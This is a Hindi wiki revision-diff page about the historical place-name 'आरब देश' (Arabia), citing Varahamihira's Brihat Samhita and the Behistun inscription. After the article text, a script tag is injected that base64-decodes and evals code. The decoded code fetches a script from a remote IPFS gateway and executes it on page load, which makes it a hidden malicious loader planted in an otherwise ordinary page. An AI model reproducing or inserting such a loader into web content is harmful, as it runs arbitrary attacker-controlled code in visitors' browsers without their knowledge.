Difference between revisions of "आरब देश"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*वराहमिहिर की वृहत्संहिता 14, 17 में अरब का आरब...' के साथ नया पन्ना बनाया)
 
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
*वराहमिहिर की वृहत्संहिता 14, 17 में [[अरब देश|अरब]] का आरब नाम से उल्लेख है।  
+
*[[वराहमिहिर]] की [[वृहत्संहिता]] 14, 17 में [[अरब देश|अरब]] का '''आरब नाम''' से उल्लेख है।  
*बहिस्तां अभिलेख<ref>जर्नल, आव रॉयल सोसायटी, जिल्द 15</ref> में अरब के प्राचीन नाम 'अरवय' का उल्लेख है।<ref>देखें वनायु</ref>  
+
*बहिस्तां अभिलेख<ref>जर्नल, ऑफ रॉयल सोसायटी, जिल्द 15</ref> में अरब के प्राचीन नाम ''''अरवय'''' का उल्लेख है।<ref>[[वनायु]]</ref>  
  
 
{{point}}अधिक जानकारी के लिए देखें:- [[अरब देश]]
 
{{point}}अधिक जानकारी के लिए देखें:- [[अरब देश]]
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 69| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 +
 +
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
Line 11: Line 14:
 
{{विदेशी स्थान}}
 
{{विदेशी स्थान}}
 
[[Category:विदेशी स्थान]]
 
[[Category:विदेशी स्थान]]
[[Category:ऐतिहासिक स्थान कोश]]
+
[[Category:ऐतिहासिक स्थान कोश]] [[Category:ऐतिहासिक स्थानावली]]
[[Category:नया पन्ना]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 07:55, 5 May 2018

{{#icon: Redirect-01.gif|dhyan dean}}adhik janakari ke lie dekhean:- arab desh

tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 69| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar


  1. jarnal, aauph r aauyal sosayati, jild 15
  2. vanayu

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>